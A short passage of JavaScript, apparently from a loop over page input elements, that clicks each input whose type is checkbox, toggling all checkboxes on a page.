if (inputs[i].getAttribute('type') == 'checkbox') {
inputs[i].click();
}
}